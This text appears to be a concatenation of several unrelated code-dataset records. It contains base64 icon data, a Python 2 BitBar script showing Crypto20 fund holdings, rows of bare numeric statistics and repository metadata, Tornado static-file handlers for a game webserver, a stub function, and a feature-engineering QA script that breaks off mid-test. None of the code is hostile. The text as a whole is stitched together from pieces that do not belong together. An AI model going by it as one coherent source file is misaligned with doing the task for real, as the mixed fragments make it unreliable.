quC8WJi0CY/UlmBcZwuh0adDV1QUnKypBrkyFsNBg6Y4YkfEI7ArDmFdA7y4lxUAjhQm4VNPtPVM+SFu1agYvCLz1QTur080HgcQ8MDAQXtTGwu2WZuzDAeq2WPgbV367Q8G09fUek3BUAnp9EUuz12g08IQIV1eHfTdu3BKvS07M1pAwY1FkRZaDzs5OYNn+arxjMkFQUDAm2QBt90z3ojuvtVICOTk5Hgl4zYEi0lgyMzOFq1evyk9fuLx956d71/b29YU6JikDkpcsVtFkYxCD4hMWQWHZOVgwNxbu3msDC3CQMHO6cL+9k2lpaq44bQbzwEFIWrqLRwK0q1HwQ8eLZn9/+txJa68tTsQiOVE76NdmQFi4GtvtduluIyIiYPLKdNzc3IgCZ8yG+dOiRLtD8Kmuquy2tLZ+RSG12npcXOwOTlfcCJB7ZgwEfO+BvKSGhluXbA5e5iT367Q/Ao0mXFyYlIR4XpDAyfWA0+kApVKJdDodyQNMw4xqf7kM12trt544caSRdkri0+PpKQG3HCCbpbvyYSBewKLBj2O3TJ+q/hpE8c7KV9MZf9JseN5J+k1/ctOR5CJYrTbag3DDX/XobElZ7rH8Qz8CAS8uLvYKTgl4FBqFxxUf7/umsqmXx62PRP6W2YYbu+2DD31vtWOhtqEFb/vwk+8GbCnDfpaPOxv27gZEdYQALTda9xx5fOlaAN9x6mJJCXRaepHfJBkJSP9Xlo4y2STc3tbGFOTnw4ypkYfpfpLE1LfHzKd6lwx+yVwLw0ej0SjWpBhxrhHw+UzuDXXvvqTyGyQdFVEoQh0KpPNijuPA
1mfFR7/NE7rMFkYml5t/ra668OCBlm1pMfazHO70sbnHCLj2kM7DIAOI1sKsuJ6e1t3+c56Dd57fh/qqN8DZC+exiABhLKDCEz8wjU3NWKlUwP2OTjW1DwmpG/P0dJ9bFdDFIZFyQYSHd9eqAsxMB8PwLERzKxJv4r+Naaji7lELq1R2325sckwJDop2OJygkvtJSeel6oZcD8xGjQAYQHLmI+Pm2swWYJycKPA9Tvm//mh++JpCk2Cb0/N77YLUlCWrfX18uhmGISUp/4f6TtFqx0xAum/0COhJmRaDIHLsQz9GBvyf3b4qPzk42Liya9tPbdqPkI06gQMH2nfsMRTwGN5XhwWW0qUUANFIJ2OIVwL0I0REigAKi9nrsJvVvo96FU5V5DHZpp/y4T1EMl3PXuxazuRlZTknT/avE7FQsXPz5ptAm9nT/IxScEq8pqYmAHv52XTtcY1HSNs+WFAQTe1ca3Q+bqEfIWr0c2lpcnl5+Xo6r6kxcCSlJVK4CNxKdzjg8Dm1HUtGXAE1pmGvqKgIdDqFZBHEG1VVtaFLlybflxyTXosy+xNzuGNiQ9QY0d8uImPW/nDbEQRcCp7n1wGDTcTnrNTUpCq6TkFcek/jgH7UPZ7sBsuQhp46OXPmzGoyMixiI3o57jhdk07vyXoC1qQIUAAiQllZWRQ5/TTS30vJL5ZifUZGF9ExRDeusI6Hl0SAnpIakb7eYbVa88jPiFTfpJSeKbhXohT4WYbdK/CA4ola6FhOnlT/Hxh0tLJyBDVNAAAAAElFTkSuQmCC',
'WAVES': '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',
'PPT': 'populous',
'STRAT': 'stratis',
'BTS': 'bitshares',
'ARK': 'ark',
'BTG': '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'
}
def update_c20():
    """Print a BitBar/xbar menu for Crypto20 (C20) fund holdings.

    Emits BitBar-formatted lines (menu-bar icon, '---' separators, one row
    per holding) on stdout.  Python 2 syntax (print statements).

    Relies on module-level globals populated elsewhere in this file:
    ``result`` (fund API response: presale, usd_value, nav_per_token,
    holdings), ``btg_result`` (BTG ticker response), ``number_of_c20``
    (user's token count), ``symbol_image_map``, ``symbol_price`` and
    ``symbol_path_map``.
    """
    # Only render once the fund API has returned sane, non-zero figures.
    if result['presale'] > 0 and result['usd_value'] > 0:
        # calculate btg nav
        # 458: presumably the fund's fixed BTG coin count — TODO confirm.
        btg_val = int(float(btg_result[0]['price_usd']) * 458)
        # 0.98 / 0.87 look like fee / discount factors applied to the
        # per-token BTG contribution — NOTE(review): verify against fund docs.
        btg_nav = float(btg_val) / float(result['presale']) * 0.98 * 0.87
        # add on top of current nav
        net_asset_value = float(result['nav_per_token']) + btg_nav
        usd_value = net_asset_value * number_of_c20
        # Menu-bar line: C20 icon as a base64 template image.
        print '| templateImage={}'.format(symbol_image_map['C20'])
        print '---'
        # print nav, value of your coins, and total fund value
        print 'NAV:\t\t${:.4f}\nHoldings:\t${:,}\nFund:\t\t${:,}'.format(net_asset_value, int(usd_value), btg_val + int(result['usd_value']))
        # print number of c20 you have
        print 'C20:\t{:.4f} | image={}'.format(number_of_c20, symbol_image_map['C20'])
        # separator bitbar recognizes and puts everything under it into a menu
        print '---'
        # print holdings
        holdings = result['holdings'];
        # BTG is tracked separately (not in the API's holdings list), so
        # append it manually; note this mutates the shared result dict's list.
        holdings.append({'name': 'BTG', 'value': btg_val})
        for holding in holdings:
            crypto_name = holding['name']
            crypto_value = float(holding['value'])
            # Percentage of the fund's total USD value held in this coin.
            crypto_percentage = crypto_value/float(result['usd_value'])*100
            # Look up the unit price via the coin's API path key.
            crypto_price = float(symbol_price[symbol_path_map[crypto_name]])
            print '{:s}:\t{:.2f}%\t${:,}\t${:,.2f} | image={}'.format(crypto_name,
                crypto_percentage, holding['value'], crypto_price,
                symbol_image_map[crypto_name])

update_c20()
| 629.455285
| 4,629
| 0.954936
| 2,331
| 77,423
| 31.689404
| 0.840412
| 0.14044
| 0.153558
| 0.00069
| 0.002735
| 0.002247
| 0.002247
| 0.001191
| 0.001191
| 0
| 0
| 0.1421
| 0.010527
| 77,423
| 122
| 4,630
| 634.614754
| 0.822133
| 0.007465
| 0
| 0.10989
| 0
| 0.241758
| 0.972588
| 0.963711
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021978
| null | null | 0.065934
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
acbd10ef0c83be880d8959765de7ef18ed70b468
| 1,887
|
py
|
Python
|
crawl-ref/source/webserver/game_data_handler.py
|
Hellmonk/posthellcrawl
|
362cdb2e511a451683f4754f147d5e737658cc84
|
[
"CC0-1.0"
] | 21
|
2016-11-03T13:52:57.000Z
|
2021-06-25T07:51:20.000Z
|
crawl-ref/source/webserver/game_data_handler.py
|
Implojin/hellcrawl
|
cbb74c842c7b3f85492c75484174de947c2a5014
|
[
"CC0-1.0"
] | 34
|
2017-01-31T11:33:10.000Z
|
2018-09-25T07:34:59.000Z
|
crawl-ref/source/webserver/game_data_handler.py
|
Implojin/hellcrawl
|
cbb74c842c7b3f85492c75484174de947c2a5014
|
[
"CC0-1.0"
] | 6
|
2017-01-04T03:21:49.000Z
|
2021-02-15T02:30:39.000Z
|
import tornado.web
import os.path
import config
class GameDataHandler(tornado.web.StaticFileHandler):
    """Serve versioned game-data files.

    URLs carry a version prefix; each version is registered via
    ``add_version`` and mapped to its own client directory, which becomes
    the static root for that request.
    """

    # version string -> absolute client path, filled in by add_version().
    _client_paths = {}

    def initialize(self):
        # The real root is chosen per-request in get(); "." is a placeholder.
        super(GameDataHandler, self).initialize(".")

    def head(self, version, path):
        # HEAD is GET without the response body.
        self.get(version, path, include_body=False)

    def get(self, version, path, include_body=True):
        try:
            self.root = GameDataHandler._client_paths[version]
        except KeyError:
            # Unknown version -> 404 before touching the filesystem.
            raise tornado.web.HTTPError(404)
        super(GameDataHandler, self).get(path, include_body)

    def set_extra_headers(self, path):
        # When configured, defeat all client/proxy caching of game data.
        if not config.game_data_no_cache:
            return
        self.set_header("Cache-Control",
                        "no-cache, no-store, must-revalidate")
        self.set_header("Pragma", "no-cache")
        self.set_header("Expires", "0")

    @classmethod
    def add_version(cls, version, path):
        """Register *path* as the client directory for *version*."""
        cls._client_paths[version] = os.path.abspath(path)
class MorgueHandler(tornado.web.StaticFileHandler):
    """Serve versioned morgue files.

    Mirrors GameDataHandler: a version prefix in the URL selects a
    directory registered through ``add_version``, which is used as the
    static root for the request.
    """

    # version string -> absolute client path, filled in by add_version().
    _client_paths = {}

    def initialize(self):
        # The real root is chosen per-request in get(); "." is a placeholder.
        super(MorgueHandler, self).initialize(".")

    def head(self, version, path):
        # HEAD is GET without the response body.
        self.get(version, path, include_body=False)

    def get(self, version, path, include_body=True):
        try:
            self.root = MorgueHandler._client_paths[version]
        except KeyError:
            # Unknown version -> 404 before touching the filesystem.
            raise tornado.web.HTTPError(404)
        super(MorgueHandler, self).get(path, include_body)

    def set_extra_headers(self, path):
        # When configured, defeat all client/proxy caching.
        if not config.game_data_no_cache:
            return
        self.set_header("Cache-Control",
                        "no-cache, no-store, must-revalidate")
        self.set_header("Pragma", "no-cache")
        self.set_header("Expires", "0")

    @classmethod
    def add_version(cls, version, path):
        """Register *path* as the client directory for *version*."""
        cls._client_paths[version] = os.path.abspath(path)
| 33.105263
| 66
| 0.647589
| 224
| 1,887
| 5.276786
| 0.21875
| 0.07445
| 0.076142
| 0.07445
| 0.800338
| 0.800338
| 0.800338
| 0.717428
| 0.717428
| 0.639594
| 0
| 0.005563
| 0.237944
| 1,887
| 56
| 67
| 33.696429
| 0.816412
| 0
| 0
| 0.697674
| 0
| 0
| 0.075252
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.232558
| false
| 0
| 0.069767
| 0
| 0.395349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a0a800c4a1499ac4aaad12249fceb5a281cec43
| 28
|
py
|
Python
|
src/zig/utilities.py
|
rx-gan/zig
|
5bdbbbda85ff3ac85a0c7a91dc54d995602f9a96
|
[
"MIT"
] | null | null | null |
src/zig/utilities.py
|
rx-gan/zig
|
5bdbbbda85ff3ac85a0c7a91dc54d995602f9a96
|
[
"MIT"
] | null | null | null |
src/zig/utilities.py
|
rx-gan/zig
|
5bdbbbda85ff3ac85a0c7a91dc54d995602f9a96
|
[
"MIT"
] | 1
|
2021-07-14T15:37:38.000Z
|
2021-07-14T15:37:38.000Z
|
def generate_id():
    """Generate an identifier.

    Stub: not yet implemented, returns None.
    """
    return None
| 9.333333
| 18
| 0.642857
| 4
| 28
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 28
| 2
| 19
| 14
| 0.809524
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
4a1c8ae6984ae9ec1b616c78517f0e10ca2113e3
| 19,020
|
py
|
Python
|
tests/FeatureEngineering_QA.py
|
SeanBenner/RetroFit
|
1417775c2154c2127b3dedaf133f8f21d5f1adfa
|
[
"MIT"
] | null | null | null |
tests/FeatureEngineering_QA.py
|
SeanBenner/RetroFit
|
1417775c2154c2127b3dedaf133f8f21d5f1adfa
|
[
"MIT"
] | null | null | null |
tests/FeatureEngineering_QA.py
|
SeanBenner/RetroFit
|
1417775c2154c2127b3dedaf133f8f21d5f1adfa
|
[
"MIT"
] | null | null | null |
# =====================================================================
# QA: Test FE0_AutoLags
# Manual QA script: each scenario loads a benchmark CSV, times a call to
# retrofit's FE0_AutoLags, then prints elapsed time, the resulting
# column names, and the returned ArgsList.  FE0_AutoLags returns a dict
# with 'data' and 'ArgsList' keys (see the Output[...] accesses below).
# NOTE(review): the commented "# # Args" blocks are scratch notes for
# interactive runs and do not always match the call directly above them.
# =====================================================================
import timeit
import datatable as dt
import polars as pl
import retrofit
from retrofit import FeatureEngineering as fe
## No Group Example: datatable
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data1 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data1.names)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=1
# LagColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=None
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## No Group Example: polars
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=None, ImputeValue=-1.0, Sort=True, Processing='polars', InputFrame='polars', OutputFrame='polars')
t_end = timeit.default_timer()
print(t_end - t_start)
data2 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data2.columns)
print(ArgsList)
# # Args (scratch notes — values here differ from the call above)
# data=data
# LagPeriods=1
# LagColumnNames='Weekly_Sales'
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1.0
# Sort=True
# Processing='polars'
# InputFrame='polars'
# OutputFrame='polars'
## Group Example, Single Lag: datatable
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
Output = fe.FE0_AutoLags(data=data, ArgsList=None, LagPeriods=1, LagColumnNames='Leads', DateColumnName='CalendarDateColumn', ByVariables=['MarketingSegments','MarketingSegments2','MarketingSegments3', 'Label'], ImputeValue=-1, Sort=True, Processing='datatable', InputFrame='datatable', OutputFrame='datatable')
t_end = timeit.default_timer()
print(t_end - t_start)
data1 = Output['data']
ArgsList = Output['ArgsList']
del Output
print(data1.names)
print(ArgsList)
# # Args
# ArgsList=None
# LagPeriods=1
# LagColumnNames='Leads'
# DateColumnName='CalendarDateColumn'
# ByVariables=['MarketingSegment','MarketingSegment2','MarketingSegment3', 'Label']
# ImputeValue=-1
# Sort=True
# Processing='datatable'
# InputFrame='datatable'
# OutputFrame='datatable'
## Group Example: polars
data = pl.read_csv("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
t_start = timeit.default_timer()
